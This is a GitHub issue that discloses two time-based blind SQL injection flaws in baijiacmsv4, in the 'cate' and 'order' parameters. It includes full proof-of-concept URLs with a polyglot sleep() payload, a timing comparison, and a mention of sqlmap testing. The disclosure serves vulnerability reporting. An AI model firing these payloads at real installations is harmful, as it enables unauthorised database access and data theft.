Skip to content
This repository has been archived by the owner on Jul 21, 2022. It is now read-only.

Two Vulnerability of Time-based SQL injection #2

Open
wxdigo8 opened this issue Jan 8, 2019 · 0 comments
Open

Two Vulnerability of Time-based SQL injection #2

wxdigo8 opened this issue Jan 8, 2019 · 0 comments

Comments

@wxdigo8
Copy link

wxdigo8 commented Jan 8, 2019

0x1:description
Two time-based SQL blinds to get data。

0x02:POC
First:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383

second:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&page=1&_=1546926470383

0x03:description
request the url:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
No time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344a7845064.png

request the url:
http://127.0.0.1:88/baijiacmsv4-master/index.php?act=index&beid=1&by=&cate=(select(0)from(select(sleep(10)))v)/*'%2b(select(0)from(select(sleep(10)))v)%2b'%22%2b(select(0)from(select(sleep(10)))v)%2b%22*/&do=goods&isdiscount=&ishot=&isnew=&isrecommand=&issendfree=&istime=&keywords=&m=eshop&merchid=&mod=mobile&op=get_list&order=&page=1&_=1546926470383
time delay
Screenshot:
https://i.loli.net/2019/01/08/5c344afbc5d7d.png

Test with sqlmap:
https://i.loli.net/2019/01/08/5c344b46484a1.png

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant